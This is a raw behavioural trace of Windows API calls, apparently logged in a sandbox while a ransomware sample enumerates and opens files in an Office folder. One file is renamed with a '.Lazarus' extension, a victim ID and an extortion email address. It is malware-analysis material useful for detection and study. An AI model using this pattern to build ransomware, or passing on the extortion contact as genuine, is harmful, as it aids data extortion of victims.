lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8d178, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 80 [0101.437] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.437] GetLastError () returned 0x5 [0101.437] GetLastError () returned 0x5 [0101.437] SetLastError (dwErrCode=0x5) [0101.437] GetLastError () returned 0x5 [0101.437] SetLastError (dwErrCode=0x5) [0101.437] GetLastError () returned 0x5 [0101.437] SetLastError (dwErrCode=0x5) [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0101.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0101.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0101.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0101.437] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x9e, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f9b0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x9e, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0101.437] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4bb78 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0101.438] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x780d0 [0101.438] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x95999f42, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x95999f42, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.438] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x95999f42, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x168258, dwReserved0=0x0, dwReserved1=0x0, cFileName="pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="PIDGEN~1.LAZ")) returned 1 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4bb78 | out: hHeap=0x20000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c8f0 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0101.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4b4b0 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x164) returned 0x5e870 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b4b0 | out: hHeap=0x20000) returned 1 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x140) returned 0x4e568 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0101.439] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.439] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.439] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.439] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0101.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0101.439] AreFileApisANSI () returned 1 [0101.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 154 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0101.439] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.439] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.440] AreFileApisANSI () returned 1 [0101.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8cb90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0101.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x5e870 [0101.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8cb90, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0101.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.440] GetFileType (hFile=0x27c) returned 0x1 [0101.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0101.441] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.441] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.441] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.441] CloseHandle (hObject=0x27c) returned 1 [0101.441] AreFileApisANSI () returned 1 [0101.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8cb90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0101.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x5e870 [0101.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8cb90, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0101.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.442] GetFileType (hFile=0x27c) returned 0x1 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0101.442] CloseHandle (hObject=0x27c) returned 1 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0101.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0101.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cc38 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0101.444] AreFileApisANSI () returned 1 [0101.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8cb90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0101.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x5e870 [0101.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8cb90, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0101.444] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x95999f42, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x168258)) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0101.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.444] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xda982389, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x902bb, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, 